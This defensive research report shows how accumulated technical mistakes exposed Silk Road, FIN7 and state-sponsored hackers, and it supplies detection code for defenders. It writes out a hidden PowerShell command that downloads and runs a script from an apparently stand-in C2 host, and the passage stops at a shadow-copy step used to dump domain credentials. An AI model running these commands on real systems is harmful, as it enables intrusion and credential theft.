Introduction to OPSEC (Part 2)

The Domino Effect: An Analysis of Catastrophic OPSEC Failures Through Aggregated Technical Lapses

This research validates the thesis that major operational security (OPSEC) compromises are overwhelmingly the product of an accumulation of fundamental technical errors, rather than singular, indefensible exploits. Through in-depth forensic analysis of Ross Ulbricht (Silk Road), the FIN7 cybercrime syndicate, and state-sponsored actors (Russian APTs and the Chinese group Volt Typhoon), this report demonstrates a recurring pattern: sophisticated custom malware and advanced tactics are consistently undermined by rudimentary failures in identity management, infrastructure hardening, and tool configuration. Key findings include identity leakage through public code snippets, insecure default settings in Command and Control (C2) frameworks like Cobalt Strike, data exposure from misconfigured web servers, and the reuse of infrastructure footprints. This report provides a comprehensive framework of actionable, technical countermeasures for hardening infrastructure, along with specific, high-fidelity detection signatures derived directly from the adversaries’ mistakes. The central takeaway for defenders is that focusing on fundamental security hygiene provides a disproportionately high return on investment, creating a brittle operational environment for even the most advanced threat actors.

Section 1: The Anatomy of OPSEC Failure: A Foundational Framework

1.1 The Core Thesis: Catastrophe by Aggregation, Not by Singular Exploitation

The prevailing narrative in cybersecurity often gravitates toward the specter of the unknown: the zero-day exploit, the unbreakable encryption, the novel malware that bypasses all defenses. While these advanced threats are real, they do not represent the primary mechanism through which sophisticated operations are compromised. This report posits and demonstrates an alternative thesis: catastrophic operational security failures are systemic, arising not from a single, brilliant stroke by an attacker but from a chain reaction of seemingly minor, often uncorrelated, technical mistakes made by the operator.

This is a “death by a thousand cuts” model of compromise, where a series of fundamental lapses in security hygiene (a reused username, a default software configuration, a misconfigured server setting) accumulate to create an undeniable pathway for forensic investigation and attribution. This perspective shifts the focus from defending against the indefensible to mastering the fundamentals. For network defenders, this is an optimistic conclusion. It suggests that a rigorous, consistent application of basic, verifiable security practices can disrupt and neutralize the operations of even the most well-resourced and technically advanced adversaries. The failure is not in the strength of their tools but in the brittleness of the human processes and technical configurations that underpin them.

1.2 Deconstructing the OPSEC Lifecycle: A Coherent Framework

To systematically analyze these failures, this report adopts the five-stage OPSEC lifecycle as its foundational framework.1 This model provides a structured lens through which the technical mistakes of each case study can be evaluated not as isolated incidents, but as failures within a logical process. Crucially, these stages are not an independent checklist but a causal chain; a failure in an early stage precipitates and guarantees failures in subsequent stages, creating a cascading effect that leads directly to compromise.

1.2.1 Mapping to Principle 1: Identify Critical Information

The first stage of OPSEC is to identify the specific data that, if compromised, would undermine the operation. The actors in each case study had distinct sets of critical information to protect.

- Ross Ulbricht (Silk Road): The primary critical information was the link between his real-world identity, Ross William Ulbricht, and his online pseudonym, “Dread Pirate Roberts” (DPR). A secondary, but equally vital, piece of information was the true IP address and physical location of the Silk Road servers, which were meant to be obscured by the Tor network.2

- FIN7: As a financially motivated criminal enterprise, FIN7’s critical information included the attribution of their custom malware families (e.g., POWERPLANT, GRIFFON) and the location and identity of their C2 infrastructure. Maintaining this anonymity was essential for the long-term viability of their operations and the continued use of their toolsets.5

- State-Sponsored APTs (Russian groups and Volt Typhoon): For state-sponsored actors, the most critical information is attribution. Their primary goal is to conduct espionage or pre-position for future operations while maintaining plausible deniability. Therefore, any technical artifact linking their activity back to a specific government (e.g., Russia’s SVR or FSB, or, in Volt Typhoon’s case, the People’s Republic of China) or revealing their stealthy presence on a target network constitutes a compromise of critical information.6

1.2.2 Mapping to Principle 2: Analyze Threats

This stage requires an actor to accurately identify the adversary and their capabilities. In all three case studies, the principal threat was a well-resourced and persistent investigator: a federal law enforcement agency such as the FBI or IRS, a government cybersecurity agency such as CISA, or a private-sector threat intelligence firm such as Mandiant. These entities possess the capability to perform large-scale data correlation, connecting disparate digital artifacts from across the open internet, dark web, and network telemetry logs to build a cohesive picture of an operation.2 The threat is not just a technical exploit but a patient, analytical process of connecting the dots.

1.2.3 Mapping to Principle 3: Analyze Vulnerabilities

OPSEC vulnerabilities are the specific technical configurations, coding practices, or infrastructure choices that expose the critical information identified in Principle 1 to the threats analyzed in Principle 2. This is the nexus of technical failure. The case studies are replete with examples:

- Posting a code snippet on a public forum under a username linked to a real identity.11

- Using default, easily signatured configurations for C2 frameworks like Cobalt Strike.12

- Failing to properly configure a web server to prevent it from leaking its true IP address.4

- Reusing IP addresses or domains across multiple campaigns, allowing investigators to link them.13

1.2.4 Mapping to Principle 4: Assess Risk

This stage involves evaluating the probability and impact of a vulnerability being exploited. A consistent theme across the case studies is a flawed risk calculus: actors frequently underestimate the cumulative risk of low-level technical mistakes. They may correctly judge a major flaw (e.g., a cryptographic weakness in the Tor protocol) to be high-impact but unlikely to be exploited. However, they misjudge minor flaws (e.g., a reused username or a default certificate) as low-risk, overlooking the high probability that each will be discovered and correlated with other minor flaws. It is the aggregation of these seemingly low-risk vulnerabilities that creates a high-impact, catastrophic failure.
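As a rough illustration of this aggregation effect, assume (purely hypothetically) that an operator leaves n minor flaws, each discovered independently with probability p_i. The probability that investigators find at least one of them is:

$$
P(\text{at least one flaw discovered}) = 1 - \prod_{i=1}^{n} \left(1 - p_i\right)
$$

With ten flaws at p_i = 0.1 each, this gives $1 - 0.9^{10} \approx 0.65$, even though every individual flaw looks unlikely to be found. The figures are illustrative only; real discoveries are not independent draws, since each artifact found tends to make the next easier to locate.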

1.2.5 Mapping to Principle 5: Apply Countermeasures

The final stage is the application of measures to mitigate the identified risks. The catastrophic failures analyzed in this report are notable precisely because they were preventable. The countermeasures required were not novel, complex, or expensive. They were, in all cases, basic, well-understood security best practices: using unique personas for development and operational activities, customizing C2 profiles to remove default indicators, and adhering to standard web server hardening checklists. The failure to apply these simple countermeasures represents the final, and most consequential, breakdown in the OPSEC lifecycle.

The interconnectedness of these principles reveals how an initial error in judgment can guarantee an eventual compromise. If an operator fails at Principle 1 by not classifying a piece of data (like their personal email address) as critical, they will logically fail at Principle 3, as they will not see its exposure on a public forum as a vulnerability. This flawed perception leads to a failure at Principle 4, where the risk of posting on that forum is assessed as negligible. Consequently, this guarantees a failure at Principle 5, as the operator sees no risk that requires a countermeasure. This cascading failure model, initiated by a single cognitive error, makes the final technical compromise almost inevitable.

Section 2: Case Study I: Ross Ulbricht and the Silk Road

2.1 The Failure Chain: From Public Forums to Server Seizure

The unravelling of Ross Ulbricht’s anonymity as the operator of the Silk Road marketplace is a canonical example of catastrophic OPSEC failure through the aggregation of minor technical and procedural mistakes. The investigative timeline did not begin with a sophisticated technical exploit against the Tor network, but with patient, open-source intelligence gathering by an IRS agent.9 The first thread was a post on a small discussion forum by a user named “altoid,” made only days after the Silk Road was launched, promoting the new site.9 Investigators followed this handle and discovered another post from “altoid” seeking to hire an IT specialist, directing applicants to a Gmail address containing the name “Ross Ulbricht”.2





This initial link from the digital persona (“altoid”) to the real-world identity (“Ross Ulbricht”) provided the foundational lead. This was later corroborated by a separate technical mistake: a post on the programming forum Stack Overflow, initially made under Ulbricht’s real name, asking for help with a PHP cURL coding problem specific to connecting to a Tor hidden service.14 The username on this account was later changed to “frosty,” a handle that matched an administrator account on the Silk Road servers, forging another strong link.9 Concurrently, a technical misconfiguration on the Silk Road’s web server briefly exposed its true IP address, allowing the FBI to locate it in Iceland and obtain a full copy of its contents.9 Analysis of the server’s configuration files revealed a whitelisted IP address for a VPN server. A subpoena to the VPN provider yielded connection logs pointing to an internet cafe near Ulbricht’s San Francisco home, enabling physical surveillance.16 The final failure occurred during his arrest at the Glen Park library, where he was logged into the Silk Road’s administrative panel on his open, unlocked laptop, providing investigators with a trove of irrefutable evidence linking him to the entire operation.9

2.2 Technical Deep-Dive: The Leaky Code Snippet

One of the most significant early failures was Ulbricht’s decision to seek technical help on a public forum. On March 16, 2012, an account on Stack Overflow, a popular question-and-answer site for programmers, posted a question titled “How can I connect to a Tor hidden service using curl in php?”.14 The account was initially registered with the username “Ross Ulbricht” and the email rossulbricht@gmail.com.14

2.2.1 Analysis of the PHP cURL Code

The code snippet provided in the post was a simple PHP script attempting to use the cURL library to make an HTTP request to a .onion address, the special-use top-level domain for Tor hidden services. The core of the code involved setting cURL options to route the connection through a local Tor proxy, which typically runs on port 9050 as a SOCKS proxy.19 A representative version of the code is as follows:

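```php
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://silkroadvb5pzir.onion"); // example .onion address
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the response body as a string
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050"); // local Tor SOCKS port
curl_setopt($ch, CURLOPT_PROXYTYPE, 7); // 7 corresponds to CURLPROXY_SOCKS5_HOSTNAME
$output = curl_exec($ch);
if ($output === false) {
    // Typical cause: no Tor daemon listening on 127.0.0.1:9050
    echo "cURL error: " . curl_error($ch) . "\n";
}
curl_close($ch);
?>
```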

The line that sets CURLOPT_PROXYTYPE to 7 is particularly revealing. Using the constant CURLPROXY_SOCKS5_HOSTNAME (or its integer value, 7) instructs cURL to pass the hostname directly to the SOCKS5 proxy for resolution, which is the correct and necessary method for resolving .onion addresses that have no public DNS records.20 This technical detail demonstrated that the user was trying to solve a problem unique to interacting with the Tor network programmatically, a problem central to the operation of the Silk Road’s backend systems, which were built on a PHP-based LAMP stack.21
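The difference between the two proxy modes is visible at the protocol level. The following Python sketch (a hypothetical helper, not part of any library) builds the SOCKS5 CONNECT request defined in RFC 1928. With address type 0x03 the hostname itself is handed to the proxy, which corresponds to what CURLPROXY_SOCKS5_HOSTNAME selects; with 0x01 the client must already hold an IPv4 address, which a .onion name can never provide. The function only constructs bytes and opens no connection.

```python
import ipaddress
import struct

SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01
RESERVED = 0x00
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03


def build_connect_request(host: str, port: int) -> bytes:
    """Build a SOCKS5 CONNECT request as laid out in RFC 1928, section 4.

    An IPv4 literal is sent as four raw bytes (ATYP 0x01). Any other host is
    sent as a length-prefixed name (ATYP 0x03), so the proxy, not the client,
    resolves it. Only the second form lets a .onion name reach Tor.
    """
    header = bytes([SOCKS_VERSION, CMD_CONNECT, RESERVED])
    try:
        dst = bytes([ATYP_IPV4]) + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode("ascii")
        if len(name) > 255:
            raise ValueError("SOCKS5 domain names are limited to 255 bytes")
        dst = bytes([ATYP_DOMAIN, len(name)]) + name
    # DST.PORT is two bytes in network (big-endian) byte order.
    return header + dst + struct.pack("!H", port)
```

For example, build_connect_request("silkroadvb5pzir.onion", 80) yields a request whose fifth byte is 21, the length of the name that follows it. In everyday use the same behavior is selected with curl’s socks5h:// proxy scheme rather than by hand-building packets.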

2.2.2 Forensic Correlation

This public post became a critical forensic artifact. The initial use of his real name and email directly tied Ross Ulbricht to the technical problem of running the Silk Road. Although he later changed the username to “frosty” and the email to frosty@frosty.com, this change itself created another link.14 “Frosty” was discovered to be the username for an administrator account used to log into the Silk Road’s servers, as revealed by the forensic analysis of the imaged server from Iceland.9 This created a clear, traceable line from Ross Ulbricht -> the Stack Overflow question -> the “frosty” persona -> the Silk Road server administration.
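The correlation described here is, at its core, a graph problem: each artifact is a node, and any identifier two artifacts share (a handle, an email address) joins them. The Python sketch below groups records transitively with a simple union-find. The record names are hypothetical labels that paraphrase the links described in this section, not actual case exhibits.

```python
from collections import defaultdict


def link_artifacts(records):
    """Group record names that share any identifier, directly or transitively.

    `records` maps a record name to the set of identifiers seen in it.
    """
    parent = {name: name for name in records}

    def find(name):
        while parent[name] != name:
            parent[name] = parent[parent[name]]  # path halving keeps trees shallow
            name = parent[name]
        return name

    def union(a, b):
        root_a, root_b = find(a), find(b)
        if root_a != root_b:
            parent[root_b] = root_a

    first_holder = {}  # identifier -> first record observed carrying it
    for name, identifiers in records.items():
        for ident in identifiers:
            if ident in first_holder:
                union(first_holder[ident], name)
            else:
                first_holder[ident] = name

    groups = defaultdict(set)
    for name in records:
        groups[find(name)].add(name)
    return list(groups.values())


# Hypothetical records paraphrasing the links described in this section.
EXAMPLE_RECORDS = {
    "forum_post_promoting_site": {"altoid"},
    "forum_post_hiring": {"altoid", "rossulbricht@gmail.com"},
    "stack_overflow_account": {"rossulbricht@gmail.com", "frosty"},
    "server_admin_account": {"frosty"},
    "unrelated_post": {"someone_else"},
}
```

Run on EXAMPLE_RECORDS, the function returns two groups: the four Ulbricht-related records, chained together through “altoid”, the Gmail address, and “frosty”, and the unrelated post on its own. No single shared identifier links the first forum post to the server account; the chain only appears once the records are considered together.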

2.2.3 OPSEC Link (Violating Principles 1 & 3)

This sequence represents a catastrophic failure of the first and third OPSEC principles. Ulbricht failed to Identify Critical Information; he did not treat his real name, his personal email address, and his development activities as sensitive data that needed to be rigorously protected and compartmentalized from his “Dread Pirate Roberts” persona. Subsequently, he failed to Analyze Vulnerabilities; he did not perceive a public, indexed forum like Stack Overflow as a significant threat vector where his real identity could be permanently linked to his criminal enterprise. This single act of seeking help publicly demonstrates the “Amateur’s Dilemma”: his technical incompetence forced him into an action that directly compromised his operational security. To make the system technically functional, he had to make his identity forensically vulnerable.

2.3 Technical Deep-Dive: The Misconfigured Server

The anonymity of the Silk Road depended entirely on the correct implementation of the Tor hidden service protocol, which is designed to conceal a server’s true IP address. This protection was nullified not by a flaw in Tor, but by a basic server administration error.9

2.3.1 The Leaky CAPTCHA/phpMyAdmin Theory

According to the FBI’s official declaration, investigators discovered the server’s IP address because of a misconfiguration in the CAPTCHA on the site’s login page.4 The theory is that some element of the CAPTCHA service was making a request that was not routed through the Tor proxy, thereby communicating directly with the public internet and revealing the server’s public IP address in the packet headers.23 When FBI agents entered this leaked IP address into a standard web browser, a portion of the Silk Road’s login page (the CAPTCHA prompt) was returned, confirming they had found the correct server.4 This IP address resolved to a data center in Reykjavik, Iceland.9

However, analysis of the seized server’s configuration files, released during legal proceedings, cast doubt on this specific explanation. Security researchers argued that the server’s configuration appeared to proxy all web content correctly, including the CAPTCHA, making a leak of this nature unlikely.24 An alternative theory, supported by server logs, suggests the leak may have originated from an exposed phpMyAdmin interface, a common web-based administration tool for MySQL databases.25 It is plausible that this administrative service was misconfigured to listen on the public IP address rather than being restricted to localhost.

2.3.2 Technical Analysis of the Leak

Regardless of whether the leak came from the CAPTCHA or phpMyAdmin, the root technical failure is identical. For a Tor hidden service to be truly hidden, every service running on the server must bind only to the localhost interface (127.0.0.1). The Tor daemon forwards hidden-service traffic to these local ports and handles all routing to and from the Tor network. If any service, such as the Apache web server or an administrative tool, listens on a public interface (0.0.0.0 or the specific public IP), it can be discovered by internet-wide port scans; likewise, any script that makes outbound calls without going through the Tor proxy can leak the server’s IP address.23 The Silk Road server’s anonymity was defeated by this fundamental misconfiguration.
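A minimal audit for this failure mode can be sketched in Python, assuming the listening addresses have already been collected (for example, from the Local Address:Port column of ss -ltn on Linux). The helper names are hypothetical. This check covers only listening sockets; an outbound leak of the kind described in the CAPTCHA theory would require inspecting egress traffic instead.

```python
import ipaddress


def parse_local_address(field: str) -> tuple[str, int]:
    """Split an address:port field such as '0.0.0.0:80', '[::1]:9050' or '*:443'."""
    host, _, port = field.rpartition(":")
    host = host.strip("[]")
    host = host.split("%", 1)[0]  # drop an interface scope such as '%lo'
    return host, int(port)


def is_exposed(host: str) -> bool:
    """True if a socket bound to `host` is potentially reachable from other machines."""
    if host in ("*", ""):
        return True  # wildcard bind: every interface
    return not ipaddress.ip_address(host).is_loopback


def exposed_listeners(fields):
    """Return (host, port) for every listener not bound to a loopback address."""
    findings = []
    for field in fields:
        host, port = parse_local_address(field)
        if is_exposed(host):
            findings.append((host, port))
    return findings
```

On a correctly configured hidden-service host, the list returned should be empty: the hidden service itself needs no publicly bound port, so anything flagged should either be rebound to 127.0.0.1 or explicitly justified.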

2.3.3 OPSEC Link (Violating Principles 3 & 5)

This is a classic failure to Analyze Vulnerabilities and Apply Countermeasures. The vulnerability was a misconfigured web service listening on a public interface. The countermeasure is a standard, well-documented server-hardening practice: bind all application services exclusively to localhost and use a firewall to drop all unsolicited inbound traffic (a hidden service needs none, because the Tor daemon reaches the Tor network through outbound connections). The entire anonymity of a multi-million-dollar criminal enterprise, ostensibly protected by the sophisticated cryptographic layers of Tor, was compromised by an error that would be flagged in a basic security audit.

2.4 Forensic Artifacts and Attribution Links

The case against Ross Ulbricht was built on a foundation of correlated digital artifacts, each one a product of an OPSEC failure.

- Digital Personas: The usernames “altoid” and “frosty” served as powerful forensic links, connecting forum posts, email addresses, and server administrator accounts across disparate platforms.9

- Email Address: The use of the rossulbricht@gmail.com address in early forum posts was the single most damaging mistake, providing investigators with their first direct, unambiguous link to his real name.2

- VPN Logs: After seizing the Icelandic server, investigators found its configuration whitelisted the IP address of a specific VPN server for administrative access. A subpoena to that VPN provider revealed connection logs originating from an internet cafe on Laguna Street in San Francisco, just down the street from Ulbricht’s residence on Hickory Street. This allowed the FBI to correlate his physical location with the administrative activities of “Dread Pirate Roberts” and establish physical surveillance.16

- Laptop Seizure: The final and most comprehensive set of artifacts came from Ulbricht’s Samsung laptop, seized while open and unlocked at the Glen Park library.9 The contents were damning and provided an undeniable link between the physical person and the digital criminal enterprise. Key artifacts found on the laptop included:

- A personal journal detailing the conception, creation, and day-to-day operation of the Silk Road.9

- A detailed accounting spreadsheet tracking the finances of the site.9

- A list of all Silk Road servers and their locations.9

- Bitcoin wallets containing over 140,000 BTC, the proceeds of the site’s commissions.9

- Chat logs and credentials showing him logged in and actively administering the site as “Dread Pirate Roberts” at the moment of his arrest.11

Section 3: Case Study II: The FIN7 Cybercrime Syndicate

3.1 The Failure Chain: From Mailed USBs to C2 Takedown



The operational methodology of the FIN7 cybercrime group presents a study in contrasts. On one hand, the group demonstrated sophistication and high effort in its initial access techniques, such as mailing physical BadUSB devices concealed in packages with teddy bears or fraudulent gift cards to bypass email gateways and social engineer employees.26 On the other hand, this creativity was frequently undermined by a lack of basic security hygiene in their command and control (C2) infrastructure. Multiple analyses of FIN7 campaigns revealed their use of the Cobalt Strike framework with its default, high-signature settings.12 This created a failure chain characterized by a stark disconnect: extreme care and resources were invested in the delivery and social engineering phase, while the backend infrastructure, the heart of the operation, was left with conspicuous, easily detectable configurations. This approach prioritized the efficiency of deployment over the stealth required for long-term operations, ultimately providing defenders with stable and reliable indicators to track and dismantle their campaigns.

3.2 Technical Deep-Dive: The BadUSB HID Attack

FIN7’s use of malicious USB devices represents an advanced implementation of the MITRE ATT&CK technique T1674, Input Injection.28 This tactic bypasses traditional network-based defenses by introducing a physical threat directly into the target environment.

3.2.1 Device Analysis

The devices used by FIN7 were commercially available microcontroller boards, often marketed as “Bad Beetle” or “LilyGO” USBs, which are based on the ATmega32U4 microcontroller.26 When inserted into a computer, these devices do not register as a mass storage device. Instead, they emulate a standard Human Interface Device (HID) keyboard. This is a critical feature of the attack, as many corporate security policies are configured to block removable storage devices (like USB flash drives) but will almost always permit the connection of a keyboard. The specific devices used in FIN7 campaigns were identified as having a Vendor ID (VID) of 0x2341 and a Product ID (PID) of 0x8037, the identifiers Arduino assigns to its Arduino Micro, an ATmega32U4 board closely related to the Arduino Leonardo and a popular platform for such projects.26
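The VID/PID pair can be turned into a simple watchlist check. The Python sketch below assumes device instance IDs in the Windows form USB\VID_xxxx&PID_xxxx\..., as recorded in sources such as setupapi.dev.log or Security event 6416 when Plug and Play auditing is enabled. The watchlist contents and function name are illustrative. Because these IDs are set in firmware, an adversary can change them, so a match is a useful lead rather than a complete defense.

```python
import re

# Illustrative watchlist of (VID, PID) pairs to alert on. 0x2341/0x8037 is the
# pair reported for the FIN7 devices discussed above.
WATCHLIST = {(0x2341, 0x8037)}

# Matches the VID_xxxx&PID_xxxx portion of a Windows device instance ID.
DEVICE_ID_RE = re.compile(r"VID_([0-9A-F]{4})&PID_([0-9A-F]{4})", re.IGNORECASE)


def flag_devices(instance_ids, watchlist=WATCHLIST):
    """Return the instance IDs whose VID/PID pair appears in the watchlist."""
    hits = []
    for instance_id in instance_ids:
        match = DEVICE_ID_RE.search(instance_id)
        if match is None:
            continue  # not a USB-style ID (e.g. PCI\VEN_...)
        vid, pid = (int(group, 16) for group in match.groups())
        if (vid, pid) in watchlist:
            hits.append(instance_id)
    return hits
```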

3.2.2 Keystroke Injection Sequence

The microcontroller’s firmware is pre-programmed to automatically inject a sequence of keystrokes as soon as it is recognized by the operating system. This process happens at machine speed, often too fast for a user to observe or interrupt. The typical injection sequence observed in FIN7 campaigns was as follows:26

- Win + R: This keyboard shortcut is sent to the host machine, which opens the Windows “Run” dialog box. This is a reliable method for getting a command execution prompt across different versions of Windows.

- powershell.exe -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://fin7-c2.com/stage1.ps1')": This command is typed into the Run dialog and executed. The command breaks down as follows:

  - powershell.exe: Launches the PowerShell interpreter.

  - -w hidden (or -WindowStyle hidden): Prevents the PowerShell console window from appearing on the user’s screen, making the execution less conspicuous.

  - -ep bypass (or -ExecutionPolicy Bypass): Temporarily overrides the system’s PowerShell execution policy, allowing unsigned scripts to run.

  - -c "…": Specifies the command to be executed.

  - IEX(...): Invoke-Expression is a powerful PowerShell cmdlet that executes a string as if it were a command.

  - (New-Object Net.WebClient).DownloadString(...): This creates a web client object in memory and uses it to download the content of the specified URL as a string.

- Payload Execution: The downloaded script, stage1.ps1, acts as a “cradle” or stager. It is executed directly in memory by IEX and is responsible for downloading and running the next stage of the attack, which could be the GRIFFON JavaScript-based downloader or the POWERPLANT PowerShell backdoor.5
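The command line in the second step combines features that are individually common but rare together. The Python sketch below scores a process command line against four hypothetical heuristics drawn from the breakdown above. The patterns are deliberately simple and will miss obfuscated variants (PowerShell also accepts other parameter abbreviations and encoded commands), so they are a starting point for hunting rather than a signature.

```python
import re

# Heuristics derived from the cradle breakdown above; names are illustrative.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.IGNORECASE),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "web_download": re.compile(r"net\.webclient|downloadstring|downloadfile", re.IGNORECASE),
}


def matched_indicators(command_line: str) -> list[str]:
    """Return the sorted names of all heuristics that match the command line."""
    return sorted(name for name, pattern in INDICATORS.items() if pattern.search(command_line))


def is_suspicious(command_line: str, threshold: int = 3) -> bool:
    """Flag command lines matching at least `threshold` heuristics (arbitrary default)."""
    return len(matched_indicators(command_line)) >= threshold
```

In Windows process-creation logs, a parent process of explorer.exe is consistent with a launch from the Run dialog, which can help separate this delivery path from PowerShell started by scheduled tasks or services.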

3.2.3 OPSEC Link (Violating Principles 3 & 4)

While the attack vector is innovative, it is not without its OPSEC vulnerabilities. The physical device itself is a forensic artifact. The specific VID and PID combination becomes a host-based indicator of compromise that can be monitored for in device connection logs. The group’s risk assessment (Principle 4) was flawed; they likely overestimated the effectiveness of the novel delivery method while underestimating the digital fingerprints left by the device’s hardware signature and the noisy, predictable nature of its payload execution (launching PowerShell from a Run dialog).

3.3 Technical Deep-Dive: Insecure C2 Infrastructure

The sophistication of FIN7’s initial access methods stands in stark contrast to the rudimentary configuration of their C2 infrastructure. The group was frequently observed using the powerful commercial penetration testing framework Cobalt Strike, but often failed to modify its well-known default settings.12 This provided defenders with a rich set of static and reliable indicators.

3.3.1 Forensic Artifacts of Default Settings

Cobalt Strike is designed with a feature called “Malleable C2,” which allows operators to customize nearly every aspect of its network traffic and in-memory footprint to evade detection.30 FIN7’s failure to utilize these features exposed several default indicators:



- Default Team Server Port (TCP/50050): A Cobalt Strike “Team Server” is the central C2 server that manages beacon callbacks and is controlled by the operators. By default, it listens for client connections from operators on TCP port 50050.29 While this port is for operator control and not beacon communication, its presence on an internet-facing server is a strong indicator of a Cobalt Strike Team Server. Internet-wide scanning services like Shodan can be used to trivially identify servers with this port open.36

- Default TLS Certificate: For its HTTPS listeners, Cobalt Strike ships with a default self-signed TLS certificate. This certificate has a static serial number (146473198) and identical, static subject and issuer fields (CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike).32 These static values are heavily signatured by security vendors and threat intelligence platforms. A simple internet scan for this certificate’s hash or serial number can instantly reveal a global map of misconfigured Cobalt Strike C2 servers.36 FIN7’s use of this default certificate made their C2 infrastructure highly visible.

- Default Named Pipes for SMB Beacon: For lateral movement within a compromised network, Cobalt Strike’s SMB Beacon uses named pipes for peer-to-peer communication, encapsulating its traffic within the SMB protocol (port 445).39 This is intended to blend in with normal Windows network traffic. However, the default names for these pipes follow predictable patterns, such as \\.\pipe\MSSE-####-server for staging and \\.\pipe\postex_#### for post-exploitation jobs, where #### represents random characters.41 Monitoring endpoint logs (specifically Sysmon Event IDs 17 for pipe creation and 18 for pipe connection) for these patterns is a high-fidelity method for detecting Cobalt Strike’s lateral movement activities.43
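The default pipe names and certificate serial lend themselves to simple matching. The Python sketch below assumes Sysmon events have already been parsed into dictionaries with EventID and PipeName keys (pipe names are assumed to appear with a leading backslash, such as \postex_3f2a), and that a certificate’s serial number has been extracted separately, for instance from the serial_number attribute of a certificate loaded with the cryptography package. The patterns cover only the unmodified defaults described above; a Malleable C2 profile can change both.

```python
import re

# Unmodified Cobalt Strike defaults described above; the #### part is randomized.
DEFAULT_PIPE_PATTERNS = (
    re.compile(r"\\MSSE-[0-9a-f]+-server$", re.IGNORECASE),
    re.compile(r"\\postex_[0-9a-f]+$", re.IGNORECASE),
)
SYSMON_PIPE_EVENTS = {17, 18}  # 17 = pipe created, 18 = pipe connected
DEFAULT_CERT_SERIAL = 146473198  # serial of the default self-signed certificate


def flag_pipe_events(events):
    """Return Sysmon pipe events whose PipeName matches a default pattern."""
    return [
        event
        for event in events
        if event.get("EventID") in SYSMON_PIPE_EVENTS
        and any(p.search(event.get("PipeName", "")) for p in DEFAULT_PIPE_PATTERNS)
    ]


def is_default_certificate(serial_number: int) -> bool:
    """True if a certificate's serial matches the shipped Cobalt Strike default."""
    return serial_number == DEFAULT_CERT_SERIAL
```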

3.3.2 OPSEC Link (Violating Principle 5)

This is a textbook failure to Apply Countermeasures. The very existence of the Malleable C2 feature in Cobalt Strike is a recognition by its developers that default settings are a liability. FIN7’s decision not to use this feature, whether due to a lack of technical skill, operational laziness, or a strategic choice to prioritize speed, was a critical OPSEC blunder. It transformed their C2 infrastructure from a potentially stealthy, hard-to-track network into one that broadcast its presence with a set of stable, reliable, and publicly known IOCs. This demonstrates the “Efficiency vs. Stealth” trade-off inherent in financially motivated cybercrime. The goal of maximizing profit incentivizes rapid, scalable deployments, for which default configurations are ideal. This business model accepts a higher rate of infrastructure attrition as a cost, contrasting sharply with the espionage-focused model of an APT that prioritizes long-term, undetected persistence above all else.

3.4 Forensic Artifacts and Attribution Links

The operational mistakes made by FIN7 created a clear set of forensic artifacts that aided in their detection and tracking.

- Network Signatures: The default TLS certificate provided a static, reliable signature for network intrusion detection systems. Traffic patterns to known Cobalt Strike C2 servers, particularly those also exposing port 50050, allowed for proactive infrastructure discovery.29 Furthermore, their use of the default Cobalt Strike DNS C2 configuration, which responds to idle queries with an A record of 0.0.0.0, created another detectable network pattern.12

- Endpoint Artifacts: On the host, the creation of named pipes matching default patterns (MSSE-*, postex_*) provided high-fidelity alerts for endpoint detection and response (EDR) platforms leveraging Sysmon data.42 The default behavior of spawning post-exploitation jobs from a rundll32.exe process also created predictable parent-child process relationships that could be hunted for in process creation logs.29
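The idle DNS response can be hunted for in resolver or passive DNS logs. The Python sketch below counts 0.0.0.0 answers per parent domain, assuming records have already been reduced to (query name, answer) pairs. Both the threshold and the naive two-label parent-domain logic are illustrative assumptions (the latter mishandles suffixes such as co.uk), and DNS sinkholes or ad blockers that also answer 0.0.0.0 would need to be filtered out.

```python
from collections import Counter

IDLE_ANSWER = "0.0.0.0"  # default idle A-record answer described above


def parent_domain(qname: str) -> str:
    """Naive registered-domain guess: the last two labels of the name."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def idle_dns_domains(records, min_hits=10):
    """Return {parent_domain: count} for domains answering 0.0.0.0 at least `min_hits` times."""
    counts = Counter(
        parent_domain(qname) for qname, answer in records if answer == IDLE_ANSWER
    )
    return {domain: n for domain, n in counts.items() if n >= min_hits}
```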

Section 4: Case Study III: Russian State-Sponsored Actors (APTs) & Volt Typhoon

4.1 The Failure Chain: Blending In Until a Misconfiguration Stands Out

The operational paradigm of state-sponsored actors, such as those attributed to Russia (e.g., APT29) and China (e.g., Volt Typhoon), is fundamentally different from that of financially motivated criminals. Their primary objective is long-term, persistent access for espionage or strategic pre-positioning, which places a premium on stealth.45 To achieve this, these groups rely heavily on Living-off-the-Land (LotL) techniques, using legitimate, pre-installed system administration tools to carry out their objectives.6 This approach is designed to blend in with normal network activity and evade detection by security tools that focus on malicious files.

The failure chain for these actors is therefore more subtle. It is not typically characterized by loud, default configurations. Instead, compromise occurs when the specific sequence of LotL commands creates a discernible, anomalous behavioral pattern, or when the actors’ advanced on-host tradecraft is undermined by a classic, rudimentary mistake in their external infrastructure, such as a misconfigured web server that exposes their tools or staging directories.51 These small but critical lapses provide the initial thread that allows investigators to unravel their otherwise stealthy operations.

4.2 Technical Deep-Dive: Living-off-the-Land (LotL) Command Sequences

A hallmark TTP for sophisticated actors, including Russian APTs and Volt Typhoon, is the theft of credentials via the dumping of the Active Directory database file, ntds.dit.10 Because this file is constantly in use and locked by the Local Security Authority Subsystem Service (LSASS) process on a live domain controller, actors must use a specific sequence of native Windows utilities to access it.

4.2.1 Credential Dumping Chain

The process typically involves the following sequence of commands, executed with administrative privileges on a domain controller:50

- Create a Volume Shadow Copy: The first step is to create a point-in-time snapshot of the system drive using the Volume Shadow Copy Service (VSS). This creates a static copy of all files, including the locked ntds.dit database. The command used is:

vssadmin create shadow /for=C:

The execution of this command, particularly on a domain controller outside of a normal backup window, is a significant indicator.54

